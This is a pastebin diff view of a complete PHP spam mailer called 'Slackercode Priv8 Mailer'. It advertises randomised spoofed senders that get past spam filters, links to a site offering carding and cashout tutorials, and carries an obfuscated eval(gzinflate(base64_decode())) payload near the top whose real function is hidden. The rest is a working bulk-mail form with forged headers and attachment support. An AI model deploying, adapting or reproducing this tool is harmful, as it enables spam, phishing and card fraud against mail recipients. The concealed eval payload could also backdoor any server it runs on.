View difference between Paste ID: Ai8zSEE0 and g0XBNjAW
SHOW: | | - or go back to the newest paste.
1
<?
2
// Slackercode Priv8 Mailer v.1.0
3
// use filename.php?inject=slackerc0de for access this mailer
4
// randomized sender email with input (random) ex. (random)@yourdomain.com
5
// http://slackerc0de.us
6
7
function QbkpvJ($dXlHty){$dXlHty=gzinflate(base64_decode($dXlHty));for($i=0;$i<strlen($dXlHty);$i++){$dXlHty[$i] = chr(ord($dXlHty[$i])-1);}return $dXlHty;}eval(QbkpvJ("7ZExT8MwEIX3+FdcC1ISibZ0bUOAAaHuLAihyrEvjWlqh/OlUEX57TgpE2JlY/Hwvud35+c7j94bZ7eeJXGSroUpE+M9cnK5fXx4eomNfUPF8Wuaii5A+KnD5AZiX0u1R1LXGuNURJ3QBpMpCMjYcI35vVJhDpSOCqM12km2OIPgqJa/4aCKZ9eCdjZmqOQRoUE6mHFbYAfyfIcrBML3Fj2jBlcMS81hw2A8oAmUApZ61pDjgAYPgXU8qrKoEYrTGOKRjkhzkTX5poRTGM2Vsfvh9EOY/HYAEjm6gqZG6RGUsywVjxEfWBxk2IPm2aLJReb5NDzR2KZl6OAgaWfs6npdhLJ25FqrZ8rVjlYXZVmuC0caabVsPsG72mgYVehFtjgHTcPv9KLH2mMnov+S/7DkKOrFbf4F"));?><?
8
9
set_time_limit(intval($_POST['timelimit']));
10
if (!function_exists('quoted_printable_encode')) {
11
    function quoted_printable_encode($input, $line_max = 75)
12
    {
13
        $hex            = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
14
        $lines          = preg_split("/(?:\r\n|\r|\n)/", $input);
15
        $linebreak      = "=0D=0A=\r\n";
16
        $line_max       = $line_max - strlen($linebreak);
17
        $escape         = "=";
18
        $output         = "";
19
        $cur_conv_line  = "";
20
        $length         = 0;
21
        $whitespace_pos = 0;
22
        $addtl_chars    = 0;
23
        for ($j = 0; $j < count($lines); $j++) {
24
            $line   = $lines[$j];
25
            $linlen = strlen($line);
26
            for ($i = 0; $i < $linlen; $i++) {
27
                $c   = substr($line, $i, 1);
28
                $dec = ord($c);
29
                
30
                $length++;
31
                
32
                if ($dec == 32) {
33
                    if (($i == ($linlen - 1))) {
34
                        $c = "=20";
35
                        $length += 2;
36
                    }
37
                    
38
                    $addtl_chars    = 0;
39
                    $whitespace_pos = $i;
40
                } elseif (($dec == 61) || ($dec < 32) || ($dec > 126)) {
41
                    $h2 = floor($dec / 16);
42
                    $h1 = floor($dec % 16);
43
                    $c  = $escape . $hex["$h2"] . $hex["$h1"];
44
                    $length += 2;
45
                    $addtl_chars += 2;
46
                }
47
                if ($length >= $line_max) {
48
                    $cur_conv_line .= $c;
49
                    $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
50
                    if (($i + $addtl_chars) > $whitesp_diff) {
51
                        $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) - $whitesp_diff)) . $linebreak;
52
                        $i = $i - $whitesp_diff + $addtl_chars;
53
                    } else {
54
                        $output .= $cur_conv_line . $linebreak;
55
                    }
56
                    $cur_conv_line  = "";
57
                    $length         = 0;
58
                    $whitespace_pos = 0;
59
                } else {
60
                    $cur_conv_line .= $c;
61
                }
62
            }
63
            $length         = 0;
64
            $whitespace_pos = 0;
65
            $output .= $cur_conv_line;
66
            $cur_conv_line = "";
67
            if ($j <= count($lines) - 1) {
68
                $output .= $linebreak;
69
            }
70
        }
71
        return trim($output);
72
    }
73
}
74
75
$action=$_POST['action'];
76
$from=$_POST['from'];
77
$subject=$_POST['subject'];
78
$realname=$_POST['realname'];
79
$replyto=$_POST['replyto'];
80
$message=$_POST['message'];
81
$emaillist=$_POST['emaillist'];
82
$file_name=$_FILES['file']['name'];
83
$contenttype=$_POST['contenttype'];
84
$file=$_FILES['file']['tmp_name'];
85
$amount=$_POST['amount'];
86
$encode_text=$_POST['encode'];
87
88
    $message = urlencode($message);
89
    $message = ereg_replace("%5C%22", "%22", $message);
90
    $message = urldecode($message);
91
    $message = stripslashes($message);
92
	$subject = stripslashes($subject);
93
	if ($encode_text == "yes") {
94
		$subject = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $subject);
95
		$subject = str_replace(' ', '_', $subject);
96
		$subject = "=?UTF-8?Q?$subject?=";
97
		$realname = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $realname);
98
		$realname = str_replace(' ', '_', $realname);
99
		$realname = "=?UTF-8?Q?$realname?=";
100
    }
101
?> 
102
103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
104
<html xmlns="http://www.w3.org/1999/xhtml">
105
106
<head>
107
<title>Slackercode PHP-Mailer V.1.0</title>
108
<link rel="SHORTCUT ICON" href="http://s25.postimg.org/4bzq9e2jv/slackercodeico.png"/>
109
<meta name="robots" content="noindex,nofollow" />
110
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
111
<link rel="stylesheet" href="http://slackerc0de.us/css/ppchk.css">
112
<script type="text/javascript"> var SPklikkanan = 'TILANG';</script> <script type="text/javascript" src="http://slackerc0de.us/js/block.js"></script>
113
</head>
114
115
116
<header>
117
	<img src="http://s25.postimg.org/gdpjtjzzj/logo_sc_tool.png"/>
118
	<h3><font color="#01DF01">Priv8 PHP Email Sender V.1.0</font></h3>
119
	<p><font color="#74DF00">Sending randomized sender for bypass <font color="#0174DF"><blink><b>Spamming</b></blink></font> emails accounts</font></p>
120
	<p>contact mail : <font color="red">alecs<font color="#04B404">[at]</font>indonesian<font color="#F8E6E0">coder</font><font color="#04B404">[dot]</font>com</font></p><hr /><hr /><br>
121
</header>
122
123
<body>
124
<div id="fb-root"></div>
125
<script type="text/javascript" src="http://slackerc0de.us/js/fbconnect.js"></script>
126
<br >
127
<p>If ( <span style="color:#FF0000;">random </span>)&nbsp; its not working for ( <span style="color:#FF0000;">Random Email Sender</span> ), Replace with a real Email ex : random@yourdomain.com</p>
128
<p>Visit <a href="http://cardingschool.or.id" rel="dofollow" ><span style="color:#FF0000;">cardingschool.or.id</span></a> for latest Tutorial, Spamz, Credit-Card, Cashout, etc.<br />
129
<br >
130
Visit <a href="http://slackerc0de.us" rel="dofollow"><span style="color:#FF0000;">Slackercode Family </span></a>for more priv8 tools.</p>
131
<br >
132
<form name="form1" method="post" action="" enctype="multipart/form-data">
133
<table width="842" border="0"> 
134
    <tr> 
135
136
      <td width="95"> 
137
        <div align="right"> 
138
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font> 
139
        </div> 
140
      </td> 
141
142
      <td width="220"> 
143
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
144
          <input type="text" name="from" placeholder="input your email sender" value="<?php print $from; ?>" size="30" /> 
145
        </font> 
146
      </td> 
147
148
      <td width="238"> 
149
        <div align="right"> 
150
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font> 
151
        </div> 
152
      </td> 
153
       
154
      <td width="271"> 
155
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
156
          <input type="text" name="realname" placeholder="input your name sender" value="<?php $realname; ?>" size="30" /> 
157
        </font> 
158
      </td> 
159
    </tr> 
160
    <tr> 
161
      <td width="95"> 
162
        <div align="right"> 
163
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font> 
164
        </div> 
165
      </td> 
166
      <td width="220"> 
167
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
168
          <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" /> 
169
        </font> 
170
      </td> 
171
      <td width="238"> 
172
        <div align="right"> 
173
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font> 
174
        </div> 
175
      </td> 
176
      <td width="271"> 
177
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
178
          <input type="file" name="file" size="24" /> 
179
        </font> 
180
      </td> 
181
    </tr> 
182
    <tr> 
183
      <td width="95"> 
184
        <div align="right"> 
185
          <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font> 
186
        </div> 
187
      </td> 
188
      <td colspan="3"> 
189
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
190
          <input type="text" name="subject" value="<?php $subject; ?>" size="90" /> 
191
        </font> 
192
      </td> 
193
    </tr> 
194
	      <td colspan="3" height="22" style="padding:10px;"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
195
196
        &nbsp; <font color="#FF0000">Encode sending information ?</font> <select style="background:#EFFBF8;;border: 1px solid #01A9DB;color:#333" size="1" name="encode">
197
        <option <?php if($encode_text == "yes"){print "selected";} ?>>yes</option>
198
        <option <?php if($encode_text == "no"){print "selected";} ?>>no</option>
199
        </select></font></td>
200
    <tr valign="top"> 
201
      <td colspan="3"> 
202
        <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font> 
203
      </td> 
204
      <td width="271"> 
205
        <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email List :</font> 
206
      </td> 
207
    </tr> 
208
    <tr valign="top"> 
209
      <td colspan="3"> 
210
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
211
          <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <br /> 
212
          <input type="radio" name="contenttype" value="plain"  /> Plain 
213
          <input type="radio" name="contenttype" value="html"checked="checked" /> HTML 
214
          <input type="hidden" name="action" value="send" /><br /> 
215
			Number to send: <input type="text" name="amount" value="1" size="10" /><br /> 
216
			Maximum script execution time (in seconds, 0 for no timelimit) <input type="text" name="timelimit" value="0" size="10" /><br /> <br /> 
217
          <input type="submit" value="Send Email" /> 
218
        </font> 
219
    <p><div class="fb-like" data-href="https://www.facebook.com/slackerc0de.us" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div></p>
220
      </td>
221
      <td width="271"> 
222
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 
223
          <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea> 
224
        </font> 
225
      </td> 
226
    </tr> 
227
  </table>
228
</form><hr/>
229
<center>
230
<table style="width: 1024px;">
231
  <tr>
232
      <td style="width: 1024px;">
233
       <div style="overflow:auto; width:1024px; height: 470px; font-size: 11px; color:lime" >
234
<?php
235
if ($action == "send") {
236
    if (!$from && !$subject && !$message && !$emaillist) {
237
		echo  "<script>alert('Please complete all the fields.');  </script>";
238
        exit;
239
    }
240
    
241
    $allemails = split("\n", $emaillist);
242
    $numemails = count($allemails);
243
    
244
    if ($file_name) {
245
        if (!file_exists($file)) {
246
            die("The file you are trying to upload could not be uploaded to the server");
247
        }
248
        $content = fread(fopen($file, "r"), filesize($file));
249
        $content = chunk_split(base64_encode($content));
250
        $uid     = strtoupper(md5(uniqid(time())));
251
        $name    = basename($file);
252
    }
253
    
254
    for ($xx = 0; $xx < $amount; $xx++) {
255
        for ($x = 0; $x < $numemails; $x++) {
256
            $to = $allemails[$x];
257
            if ($to) {
258
                $to     = ereg_replace(" ", "", $to);
259
                $nrmail = $x + 1;
260
                $domain = substr($from, strpos($from, "@"), strlen($from));
261
                print "Sending $nrmail Email of $numemails to <font color=\"magenta\">$to</font> ==>";
262
                flush();
263
                $randfrom = rand();
264
                $fromrand = str_replace("random", $randfrom, $from);
265
                $header   = "From: $realname <$fromrand>\r\nReply-To: $replyto\r\n";
266
                $header .= "Message-ID: <31337$numemails.$nrmail$domain>\r\n";
267
                $header .= "MIME-Version: 1.0\r\n";
268
                if ($file_name)
269
                    $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
270
                if ($file_name)
271
                    $header .= "--$uid\r\n";
272
                $header .= "Content-Type: text/$contenttype; charset=UTF-8\r\n";
273
                $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
274
                $header .= quoted_printable_encode($message)."\r\n";
275
                if ($file_name)
276
                    $header .= "--$uid\r\n";
277
                if ($file_name)
278
                    $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
279
                if ($file_name)
280
                    $header .= "Content-Transfer-Encoding: base64\r\n";
281
                if ($file_name)
282
                    $header .= "$content\r\n";
283
                if ($file_name)
284
                    $header .= "--$uid--";
285
                mail($to, $subject, "", $header);
286
                print "<font color=\"yellow\"> <i>Success!</i></font><br>";
287
                flush();
288
            }
289
        }
290
    }
291
    
292
}
293
?> 
294
        </div>
295
      </td>
296
   </tr>
297
</center>
298
<p class="style2">&nbsp;</p> 
299
<p class="style1">&nbsp;</p> 
300
<?php 
301
if(isset($_POST['action']) && $numemails !==0 ){
302
	echo  "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');  </script>";
303
	} 
304
?> 
305
</body> 
306
</html>